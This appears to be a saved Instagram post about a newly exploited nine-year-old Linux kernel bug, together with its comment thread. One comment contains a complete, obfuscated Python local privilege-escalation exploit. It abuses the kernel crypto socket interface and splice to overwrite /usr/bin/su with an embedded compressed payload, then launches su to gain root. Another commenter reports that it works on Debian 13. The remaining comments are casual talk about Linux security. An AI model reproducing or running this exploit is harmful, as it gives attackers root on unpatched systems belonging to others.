← Puter stuff
Open on Instagram ↗
@hakehardware · Hake Hardware
Saved 2026-05-15 · Posted 2026-04-30 · Status: New

A nine-year-old Linux kernel bug just got an exploit. One Python script under a kilobyte = root on Ubuntu, Debian, Red Hat, SUSE, Amazon Linux. Patch now. #linux #cybersecurity #kernel

Comments (15)

  • @dan.8bit 2026-05-01

    Picture this: the bug was in the code for 9 years and nobody has found it until now. The code is open-source and every day hundreds of security experts look at this code trying to find things just like this. So it took 9 years for the world's top security experts to find this. Now on the contrast Windows or MacOS code are closed-source, so the number of people who can look and analyze it a few magnitudes lower. The number of vulnerabilities there is so much more, we just don't know about them publicly. However it does not mean that bad actors did not find those already.

  • @gobofragli 2026-05-01

    Kali linux effected too?

  • @gustic.gx 2026-05-01

    Remember when there was this rumor that Linux was safer than windows? Well it's only because there was more focus on the more popular os. The day Linux becomes mainstream they're gonna find a lot of security holes...

  • @gnanavelr 2026-05-01

    #!/usr/bin/env python3
    import os as g,zlib,socket as s
    def d(x):return bytes.fromhex(x)
    def c(f,t,c):
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
    try:u.recv(8+t)
    except:0
    f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
    while i<len(e):c(f,i,e[i:i+4]);i+=4
    g.system("su")

  • @ravitejauppaluri 2026-05-01

    What's the CVE ?

  • @richard.wijnands 2026-05-01

    Tried it...works on a Debian 13. Apt update & apt full-upgrade did not patch it yet.

  • @jtczrt 2026-05-01

    I've never heard anyone call it "sue" just S U

  • @raphaelmarcilli 2026-05-01

    That is so conviniente when europe decided to left windows behind and move to linux 🤣🤣🤣🤣

  • @golferapy.me 2026-05-01

    So France (and Europe) should stick to Windows rather than Linux ?? 😂😂

  • @tech_daddyng 2026-05-01

    I was just saying we'd statt finding all sorts of vulnerabilities that we have been living with all these years, I didn't realise it had ready begun

  • @jasonsgoodtimes 2026-05-03

    First time I’ve seen someone make a video about a Linux vulnerability… nothing to do with Europe moving from windows to Linux to cut ties with American products… I’m sure…

  • @morelucid 2026-05-01

    I just started my learning journey on how to code/software development. Can someone explain the significance of this to me in a way a beginner can understand? I only understood about 2% of this video 😂😂

  • @laulauip 2026-05-02

    Another major exploit that doesn't affect me because I compile my kernel myself 🙂‍↕️

  • @xyloz_quin 2026-05-02

    Without a race condition... huh what exactly are you implying there is another system that has a permissions elevation with a race condition... oh all of them of course.

  • @yhonigrc 2026-05-02

    I'm no techie, can someone explain in human language how can someone "exploit" that without access on the machine? Did I understand correctly, that you still need a user permission somehow, right?

Content ideas (0)

No ideas generated yet. Run /instagram-sync ideate from Claude Code to create some.